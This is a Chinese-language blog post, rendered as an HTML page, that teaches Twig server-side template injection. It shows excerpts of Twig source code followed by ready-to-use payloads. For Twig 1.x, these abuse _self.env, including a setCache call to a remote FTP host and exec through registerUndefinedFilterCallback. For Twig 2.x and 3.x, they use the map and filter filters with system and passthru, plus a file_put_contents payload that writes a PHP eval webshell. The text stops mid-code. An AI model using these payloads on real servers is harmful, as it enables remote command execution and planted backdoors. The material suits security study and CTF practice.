

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/img/fluid.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="Ysper">
  <meta name="keywords" content="">
  
    <meta name="description" content="Twig模版注入前言了解python里面的jinjia2模版注入，对这个twig注入的理解就不会太难了，我的理解就是通过模版里面的一些危险函数执行命令发起攻击 0x01是php的模版语言，类似于python的jinjia2模版。 0x02如何判断是jinjia2和twig，在注入点测试49，如果回显了49就是twig，回显7777777就是jinjia2 Twig 1.xtwig 1.x有3个全局">
<meta property="og:type" content="article">
<meta property="og:title" content="Twig注入">
<meta property="og:url" content="http://easoonn.github.io/2023/10/28/Twig%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="Ysper">
<meta property="og:description" content="Twig模版注入前言了解python里面的jinjia2模版注入，对这个twig注入的理解就不会太难了，我的理解就是通过模版里面的一些危险函数执行命令发起攻击 0x01是php的模版语言，类似于python的jinjia2模版。 0x02如何判断是jinjia2和twig，在注入点测试49，如果回显了49就是twig，回显7777777就是jinjia2 Twig 1.xtwig 1.x有3个全局">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-10-28T14:22:59.000Z">
<meta property="article:modified_time" content="2023-10-28T14:23:44.540Z">
<meta property="article:author" content="Ysper">
<meta property="article:tag" content="模版注入">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>Twig注入 - Ysper</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/shubiao.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/scroll.css">
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/gradient.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"easoonn.github.io","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":true,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/load.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"A43OMPqg1j9IU6lxnXOVgDA6-gzGzoHsz","app_key":"Tvskz6WTcT0bKtxxXgrmlNWf","server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>Ysper_1</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="Twig注入"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-10-28 22:22" pubdate>
          2023年10月28日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          60 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">Twig注入</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="Twig模版注入"><a href="#Twig模版注入" class="headerlink" title="Twig模版注入"></a>Twig模版注入</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>了解python里面的jinjia2模版注入，对这个twig注入的理解就不会太难了，我的理解就是通过模版里面的一些危险函数执行命令发起攻击</p>
<h3 id="0x01"><a href="#0x01" class="headerlink" title="0x01"></a>0x01</h3><p>是php的模版语言，类似于python的jinjia2模版。</p>
<h3 id="0x02"><a href="#0x02" class="headerlink" title="0x02"></a>0x02</h3><p>如何判断是jinjia2和twig，在注入点测试49，如果回显了49就是twig，回显7777777就是jinjia2</p>
<h2 id="Twig-1-x"><a href="#Twig-1-x" class="headerlink" title="Twig 1.x"></a>Twig 1.x</h2><p>twig 1.x有3个全局变量</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell">_self 是一个特殊的全局变量，它引用了当前模板的实例<br>_charset 是一个特殊的全局变量，它引用了当前字符集。你可以使用_charset变量来指定输出模板的字符集<br>_context 引用当前上下文的特殊全局变量<br></code></pre></td></tr></table></figure>

<p>这里的攻击方式主要是用_self全局变量</p>
<p>在1.x版本中可以通过_self全局变量获取当前模版下的实例，例如利用_self获取当前twig&#x2F;template实例而且还提供了twing_environment的env属性，然后可以继续调用twig_environment下的方法.</p>
<h3 id="0x01-1"><a href="#0x01-1" class="headerlink" title="0x01"></a>0x01</h3><p>利用 setCache方法改变Twig加载php文件路径，如果开启了<code>allow_url_include</code> 开启的情况下我们可以通过改变路径实现远程文件包含：</p>
<p>setCache的源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">setCache</span>(<span class="hljs-params"><span class="hljs-variable">$cache</span></span>)</span><br><span class="hljs-function">   </span>&#123;<br>       <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">is_string</span>(<span class="hljs-variable">$cache</span>)) &#123;<br>           <span class="hljs-variable language_">$this</span>-&gt;originalCache = <span class="hljs-variable">$cache</span>;<br>           <span class="hljs-variable language_">$this</span>-&gt;cache = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Twig_Cache_Filesystem</span>(<span class="hljs-variable">$cache</span>);<br>       &#125; <span class="hljs-keyword">elseif</span> (<span class="hljs-literal">false</span> === <span class="hljs-variable">$cache</span>) &#123;<br>           <span class="hljs-variable language_">$this</span>-&gt;originalCache = <span class="hljs-variable">$cache</span>;<br>           <span class="hljs-variable language_">$this</span>-&gt;cache = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Twig_Cache_Null</span>();<br>       &#125; <span class="hljs-keyword">elseif</span> (<span class="hljs-literal">null</span> === <span class="hljs-variable">$cache</span>) &#123;<br>           @<span class="hljs-title function_ invoke__">trigger_error</span>(<span class="hljs-string">&#x27;Using &quot;null&quot; as the cache strategy is deprecated since version 1.23 and will be removed in Twig 2.0.&#x27;</span>, E_USER_DEPRECATED);<br>           <span class="hljs-variable language_">$this</span>-&gt;originalCache = <span class="hljs-literal">false</span>;<br>           <span class="hljs-variable language_">$this</span>-&gt;cache = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Twig_Cache_Null</span>();<br>       &#125; <span class="hljs-keyword">elseif</span> (<span class="hljs-variable">$cache</span> <span class="hljs-keyword">instanceof</span> Twig_CacheInterface) &#123;<br>           <span class="hljs-variable language_">$this</span>-&gt;originalCache = <span class="hljs-variable language_">$this</span>-&gt;cache = <span class="hljs-variable">$cache</span>;<br>       &#125; <span class="hljs-keyword">else</span> &#123;<br>           <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-built_in">LogicException</span>(<span class="hljs-title function_ invoke__">sprintf</span>(<span class="hljs-string">&#x27;Cache can only be a string, false, or a Twig_CacheInterface implementation.&#x27;</span>));<br>       &#125;<br>   &#125;<br></code></pre></td></tr></table></figure>

<p>大致就是这个方法传递了一个cache参数，它接收字符串，null，false用于保存传递给setCache()方法的原始缓存选项，最终，<code>setCache()</code>方法会将解析后的缓存选项存储在<code>$cache</code>属性中，以便其他方法可以使用它。从而改变了Twig的php文件路径。</p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="hljs-template-variable">&#123;&#123;_self.env.setCache(ftp://ip:port)&#125;&#125;</span><span class="hljs-template-variable">&#123;&#123;_self.env.loadTemplate(<span class="hljs-string">&quot;shell&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml">这个将twig的缓存设置为一个远程ftp地址，导致twig在下载本地缓存模版前，尝试下载制定的ftp地址下的模版</span><br></code></pre></td></tr></table></figure>

<h3 id="0x02-1"><a href="#0x02-1" class="headerlink" title="0x02"></a>0x02</h3><p>利用getFilter()</p>
<p>源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">getFilter</span>(<span class="hljs-params"><span class="hljs-variable">$name</span></span>)</span><br><span class="hljs-function">  </span>&#123;<br>      <span class="hljs-keyword">if</span> (!<span class="hljs-variable language_">$this</span>-&gt;extensionInitialized) &#123;<br>          <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">initExtensions</span>();<br>      &#125;<br><br>      <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable language_">$this</span>-&gt;filters[<span class="hljs-variable">$name</span>])) &#123;<br>          <span class="hljs-keyword">return</span> <span class="hljs-variable language_">$this</span>-&gt;filters[<span class="hljs-variable">$name</span>];<br>      &#125;<br><br>      <span class="hljs-keyword">foreach</span> (<span class="hljs-variable language_">$this</span>-&gt;filters <span class="hljs-keyword">as</span> <span class="hljs-variable">$pattern</span> =&gt; <span class="hljs-variable">$filter</span>) &#123;<br>          <span class="hljs-variable">$pattern</span> = <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-string">&#x27;\\*&#x27;</span>, <span class="hljs-string">&#x27;(.*?)&#x27;</span>, <span class="hljs-title function_ invoke__">preg_quote</span>(<span class="hljs-variable">$pattern</span>, <span class="hljs-string">&#x27;#&#x27;</span>), <span class="hljs-variable">$count</span>);<br><br>          <span class="hljs-keyword">if</span> (<span class="hljs-variable">$count</span>) &#123;<br>              <span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&#x27;#^&#x27;</span>.<span class="hljs-variable">$pattern</span>.<span class="hljs-string">&#x27;$#&#x27;</span>, <span class="hljs-variable">$name</span>, <span class="hljs-variable">$matches</span>)) &#123;<br>                  <span class="hljs-title function_ invoke__">array_shift</span>(<span class="hljs-variable">$matches</span>);<br>                  <span class="hljs-variable">$filter</span>-&gt;<span class="hljs-title function_ invoke__">setArguments</span>(<span class="hljs-variable">$matches</span>);<br><br>                  <span class="hljs-keyword">return</span> <span class="hljs-variable">$filter</span>;<br>              &#125;<br>          &#125;<br>      &#125;<br><br>      <span class="hljs-keyword">foreach</span> (<span class="hljs-variable language_">$this</span>-&gt;filterCallbacks <span class="hljs-keyword">as</span> <span class="hljs-variable">$callback</span>) &#123;<br>          <span class="hljs-keyword">if</span> (<span class="hljs-literal">false</span> !== <span class="hljs-variable">$filter</span> = <span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$callback</span>, <span class="hljs-variable">$name</span>)) &#123;<br>              <span class="hljs-keyword">return</span> <span class="hljs-variable">$filter</span>;<br>          &#125;<br>      &#125;<br><br>      <span class="hljs-keyword">return</span> <span class="hljs-literal">false</span>;<br>  &#125;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">registerUndefinedFilterCallback</span>(<span class="hljs-params"><span class="hljs-variable">$callable</span></span>)</span><br><span class="hljs-function">  </span>&#123;<br>      <span class="hljs-variable language_">$this</span>-&gt;filterCallbacks[] = <span class="hljs-variable">$callable</span>;<br>  &#125;<br></code></pre></td></tr></table></figure>

<p>发现里面有一个危险函数<strong>call_user_func</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">foreach</span> (<span class="hljs-variable language_">$this</span>-&gt;filterCallbacks <span class="hljs-keyword">as</span> <span class="hljs-variable">$callback</span>) &#123;<br>            <span class="hljs-keyword">if</span> (<span class="hljs-literal">false</span> !== <span class="hljs-variable">$filter</span> = <span class="hljs-title function_ invoke__">call_user_func</span>(<span class="hljs-variable">$callback</span>, <span class="hljs-variable">$name</span>)) &#123;<br>                <span class="hljs-keyword">return</span> <span class="hljs-variable">$filter</span>;<br></code></pre></td></tr></table></figure>

<p>所以我们只需要控制里面的$callback, $name参数就可以进行命令执行，callback的赋值需要调用</p>
<p>registerUndefinedFilterCallback()方法。</p>
<p>构造exp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;&#123;_self.env.<span class="hljs-title function_ invoke__">registerUndefinedFilterCallback</span>(<span class="hljs-string">&quot;exec&quot;</span>)&#125;&#125;&#123;&#123;_self.env.<span class="hljs-title function_ invoke__">getFilter</span>(<span class="hljs-string">&quot;id&quot;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<h2 id="Twig-2-x-amp-3-x"><a href="#Twig-2-x-amp-3-x" class="headerlink" title="Twig 2.x &amp; 3.x"></a>Twig 2.x &amp; 3.x</h2><p>在2.x以后_self就被停用了，但是又可以用一些过滤器惊醒攻击</p>
<h3 id="0x01-2"><a href="#0x01-2" class="headerlink" title="0x01"></a>0x01</h3><p>map过滤器</p>
<p>源码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">twig_array_map</span>(<span class="hljs-params"><span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-variable">$r</span> = [];<br>    <span class="hljs-keyword">foreach</span> (<span class="hljs-variable">$array</span> <span class="hljs-keyword">as</span> <span class="hljs-variable">$k</span> =&gt; <span class="hljs-variable">$v</span>) &#123;<br>        <span class="hljs-variable">$r</span>[<span class="hljs-variable">$k</span>] = <span class="hljs-variable">$arrow</span>(<span class="hljs-variable">$v</span>, <span class="hljs-variable">$k</span>);    <br>    &#125;<br><br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$r</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>重点部分在 </p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autoit">$r[$k] = $arrow($v, $k)<span class="hljs-comment">;    输入的键和键值被当成函数执行了前提是这个arrow是可控的。</span><br></code></pre></td></tr></table></figure>

<p>下一步就是找到可以在里面执行命令的函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-title function_ invoke__">system</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$command</span> [, <span class="hljs-keyword">int</span> &amp;<span class="hljs-variable">$return_var</span> ] ) : <span class="hljs-keyword">string</span><br><span class="hljs-title function_ invoke__">passthru</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$command</span> [, <span class="hljs-keyword">int</span> &amp;<span class="hljs-variable">$return_var</span> ] )<br><span class="hljs-title function_ invoke__">exec</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$command</span> [, <span class="hljs-keyword">array</span> &amp;<span class="hljs-variable">$output</span> [, <span class="hljs-keyword">int</span> &amp;<span class="hljs-variable">$return_var</span> ]] ) : <span class="hljs-keyword">string</span><br><span class="hljs-title function_ invoke__">file_put_contents</span> ( <span class="hljs-keyword">string</span> <span class="hljs-variable">$filename</span> , <span class="hljs-keyword">mixed</span> <span class="hljs-variable">$data</span> [, <span class="hljs-keyword">int</span> <span class="hljs-variable">$flags</span> = <span class="hljs-number">0</span> [, resource <span class="hljs-variable">$context</span> ]] ) : <span class="hljs-keyword">int</span><br></code></pre></td></tr></table></figure>

<p>这里我们既可以执行命令也可以写马</p>
<p>exp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;&#123;[<span class="hljs-string">&quot;ls&quot;</span>]|<span class="hljs-title function_ invoke__">map</span>(<span class="hljs-string">&quot;system&quot;</span>&#125;&#125;<br>&#123;&#123;&#123;<span class="hljs-string">&quot;&lt;?php @eval(<span class="hljs-subst">$_POST</span>[&#x27;attack&#x27;]);?&gt;&quot;</span>:<span class="hljs-string">&quot;var/www/html/shell.php&quot;</span>&#125;|<span class="hljs-title function_ invoke__">map</span>(<span class="hljs-string">&quot;file_put_contents&quot;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<h3 id="0x02-2"><a href="#0x02-2" class="headerlink" title="0x02"></a>0x02</h3><p>filter过滤器</p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">set</span> lists = [<span class="hljs-number">34</span>, <span class="hljs-number">36</span>, <span class="hljs-number">38</span>, <span class="hljs-number">40</span>, <span class="hljs-number">42</span>] <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123; lists<span class="hljs-punctuation">|</span><span class="hljs-keyword">filter</span>(v =&gt; v &gt; <span class="hljs-number">38</span>)<span class="hljs-punctuation">|</span><span class="hljs-keyword">join</span>(<span class="hljs-string">&#x27;, &#x27;</span>) &#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml">// Output: 40, 42</span><br></code></pre></td></tr></table></figure>

<p>Twig将上述的语言编译成</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">implode</span>(<span class="hljs-string">&#x27;, &#x27;</span>, <span class="hljs-title function_ invoke__">array_filter</span>(<span class="hljs-variable">$context</span>[<span class="hljs-string">&quot;lists&quot;</span>], function (<span class="hljs-variable">$__value__</span>) &#123; <span class="hljs-keyword">return</span> (<span class="hljs-variable">$__value__</span> &gt; <span class="hljs-number">38</span>); &#125;)); <span class="hljs-meta">?&gt;</span><br><br></code></pre></td></tr></table></figure>

<p>里面有个危险函数array_filter,</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-comment">/**</span><br><span class="hljs-comment"> * Filters an array or iterator using a callback function.</span><br><span class="hljs-comment"> *</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> array|\Traversable $array The array or iterator to filter</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@param</span> callable $arrow The callback function to use as a filter</span><br><span class="hljs-comment"> *</span><br><span class="hljs-comment"> * <span class="hljs-doctag">@return</span> array|CallbackFilterIterator The filtered array or iterator</span><br><span class="hljs-comment"> */</span><br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">twig_array_filter</span>(<span class="hljs-params"><span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">if</span> (\<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$array</span>)) &#123;<br>        <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">array_filter</span>(<span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span>, \ARRAY_FILTER_USE_BOTH);    <br>    &#125;<br>    <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">\CallbackFilterIterator</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">\IteratorIterator</span>(<span class="hljs-variable">$array</span>), <span class="hljs-variable">$arrow</span>);<br>&#125;<br></code></pre></td></tr></table></figure>

<p>array_filter函数接受$array, $arrow两个参数并且调用了回调函数，那么我们就可以自定义这两个参数进行攻击</p>
<p>array_filter(array,callbackfunction);</p>
<table>
<thead>
<tr>
<th>参数</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>array</td>
<td>必须，规定要过滤的字符组</td>
</tr>
<tr>
<td>callbackfunction</td>
<td>必须，规定要使用的回调函数</td>
</tr>
</tbody></table>
<p>exp</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php">&#123;&#123;[<span class="hljs-string">&quot;id&quot;</span>]|<span class="hljs-title function_ invoke__">filer</span>(<span class="hljs-string">&quot;system&quot;</span>)&#125;&#125;<br>&#123;&#123;[<span class="hljs-string">&quot;id&quot;</span>]|<span class="hljs-title function_ invoke__">filter</span>(<span class="hljs-string">&quot;passthru&quot;</span>)&#125;&#125;<br></code></pre></td></tr></table></figure>

<h3 id="0x03"><a href="#0x03" class="headerlink" title="0x03"></a>0x03</h3><p>reduce过滤器</p>
<figure class="highlight twig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs twig"><span class="hljs-template-tag">&#123;%</span> <span class="hljs-name">set</span> numbers = [<span class="hljs-number">1</span>, <span class="hljs-number">2</span>, <span class="hljs-number">3</span>] <span class="hljs-template-tag">%&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123; numbers<span class="hljs-punctuation">|</span><span class="hljs-keyword">reduce</span>((carry, v) =&gt; carry + v) &#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p>twig翻译成</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">twig_reduce_filter</span>(<span class="hljs-variable">$this</span>-&gt;env, <span class="hljs-variable">$context</span>[<span class="hljs-string">&quot;numbers&quot;</span>], function (<span class="hljs-variable">$carry</span>, <span class="hljs-variable">$v</span>) &#123; <span class="hljs-keyword">return</span> <span class="hljs-variable">$carry</span> + <span class="hljs-variable">$v</span>; &#125;);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>twig_reduce_filter</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">twig_reduce_filter</span>(<span class="hljs-params"><span class="hljs-variable">$array</span>, <span class="hljs-variable">$arrow</span>, <span class="hljs-variable">$initial</span> = <span class="hljs-literal">null</span></span>)</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">if</span> (!\<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$array</span>)) &#123;<br>        <span class="hljs-variable">$array</span> = <span class="hljs-title function_ invoke__">iterator_to_array</span>(<span class="hljs-variable">$array</span>);<br>    &#125;<br><br>    <span class="hljs-keyword">return</span> <span class="hljs-title function_ 